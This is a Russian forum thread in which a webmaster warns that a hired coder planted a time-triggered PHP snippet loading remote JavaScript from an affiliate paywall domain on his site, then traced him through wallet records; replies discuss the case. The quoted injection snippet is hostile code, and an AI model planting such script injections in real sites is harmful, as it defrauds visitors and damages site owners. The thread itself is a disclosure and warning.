Внимание на форуме крыса «Орел»

Всех приветствую! Хотел написать не большую историю,целью которой будет предупреждение о том,чтобы вы были аккуратнее с теми людьми которым доверяете свои сайты.


Месяц назад,посещаемость сайта, стала резко расти и мне потребовалось, срочно оптимизировать скрипт,так как время генерации страниц оставляло желать лучшего, следовательно для этих целей мне необходимо было найти срочно программиста, вот даже моя тема http://visavi.net/forum/topic.php?tid=40714 когда я искал его.

Один из тех кто откликнулся на эту тему, был кодер под ником Орел ( профиль http://visavi.net/pages/user.php?uz=orel )

Так как раньше,у меня уже был удачный опыт работы с этим человеком,свой выбор конечно сделал в пользу него.

Работу сделал,скрипт оптимизировал ему подкинул еще пару хороших заказов и мы пожимая руки друг другу (образно) за хорошую сделку, попрощались.


В последнее время,у меня было очень много работы в реале и следить за своими сайтами времени небыло. Единственное, что я делал как «оптимизатор» просматривал статистику и анализировал индексацию страниц в ПС,и заметил резкий спад трафика с Гугла, именно у этого сайта. В связи с этим у меня уже тогда были мысли,что на моем сайте есть какая то «бяка» которая привела к этому спаду. И вы не поверите,точно! При анализе кода страниц,я обнаружил код следующего содержания

<? if (date("H") >= 00 && date("H") <= 07): ?>
<script type="text/javascript" src="http:// jsfiles.com /?s=39&r=20347"></script>
<script type="text/javascript" src="http://jsfiles.com/?s=97&r=20347"></script>


Первым делом, конечно,я его удалил, сменил везде пароли. А потом стал вычислять, этого гаденыша, который поднасрал на моем сайте.

Сначала пробил адрес по whois jsfiles.com ,кому принадлежит этот домен. Владельцем данного платника оказалась партнёрка http://loadpays.com/.

Я связался с представителями данной партнёрской программы. Они подтвердили, что платник действительно принадлежит им. Следствии чего,я решил сранить кошлек Орла (кто последний работал над моим сайтом) с кошельком владельца аккаунта в этой партнёрки
http://prntscr.com/3z9pl6 - скрин переписки.
И кошелек действительно совпал)))

Далее, на мое имя переоформили аккаунт с теми подписками который были заработаны с трафика моего сайта. И я смог про анализировать, за какую сумму человек готов стать крысой? Сумма выплат, за весь период (нахождения этого кода у меня на сайте, с 23 июня по 3 июля 2014 года) составила 254 рубля. То есть за сранных 254 рубля,этот человек готов пожертвовать свой репутацией и стать крысой.

Поэтому, цель данного поста, не о том, чтобы рассказать, какой он плохой, а я хороший, (я и сам лоханулся в этом моменте,на самом деле).

Цель в первую очередь, предупредить вас,быть внимательней когда вы обращаетесь к таким нищекодерам ,даже если у них хорошая репутация (кстати он даже участвовал здесь в каком то конкурсе.) И все те, кто обращался к этому человеку проверьте свои сайты на левые JS коды.

Так же хочу выразить благодарность владельцам партнёрской программы http://loadpays.com/ за оперативный отклик и принятие решений.

никогда не зарегаюсь в этой пп, сдаюсь своих партнёров

3. d0dgers, Доступ к веб-странице заблокирован. Показать URL-адрес
http://loadpays.com
Страница находится в списке веб-сайтов с потенциально опасным содержимым.

NicAn (4 Июля 2014 / 13:25)
никогда не зарегаюсь в этой пп, сдаюсь своих партнёров

Я бы и так об этом узнал.)) Угадай какой там логин был? Конечно, Orel )))) тоесть он даже по логину спалился.... логин я узнал когда передали мне аккаунт,так как подписки были заработаны с трафа моего сайта. Даже потоки трафика он назвал как Orel )))

5. Viy, и чё?

Добавлено через 05:41 сек.
6. d0dgers, просто добродушные админы, мало того, что сообщили информацию о кошельке, так ещё и передали тебе аккаунт со всеми бабками. У меня был похожий случай кстати, тоже взломали один сайт и повесили редирект на пп зипвап, написал им в тикет, мол так и так, я админ сайта, и хочу узнать кто этот мерзавец. На что мягко говоря был послан на йух, при этом надо учесть, что работал с этой пп больше года, было обидно конечно, но я бы тоже так поступил на их месте )
Почему так мало бабла получилось? вроде трафика неплохо на сайтах у тебя ) и кош чё не блокаешь?

Все зависит от того,какие правила в партнерской программе. У них в правилах написано,что траф с ломаных сайтов запрещен. Именно это мне и помогло. Кстати, я даже не просил их,о том,чтобы мне передали аккаунт. Я просто попросил, наказать виновника. Конечно,мне не просто так взяли и предоставили этот аккаунт,я сначала подтвердил свои права на владении сайтом. По поводу бабла,ну ты знаешь,на подписках сразу много не заработаешь,они же как,со временем накапливаются,а потом идут ежедневные ребилы,я просто этот момент вовремя заметил и присек (код весил где то неделю).
<? if (date("H") >= 00 && date("H") <= 07): ?> причем судя по этому коду,он связан со определенным отрезком времени,только чего? со временем когда нужна лить траф на партнёрку? если да,тогда получается код срабатывал только ночью?
Поводу абузы в WebMoney думаю,хорошая идея,нужно отписать.

Проблема здесь состоит даже не в том, что кто то заработал бабла с твоего сайта. Это не те деньги, чтобы сильно заморачиваться. Обидно и основная проблема состоит в том, к каким санкциям может привести этот код который стоял на сайте. Начиная попадание в базу антивирусников и заканчивая попадание под фильтры ПС.

9. d0dgers,а что у тебя за сайт?)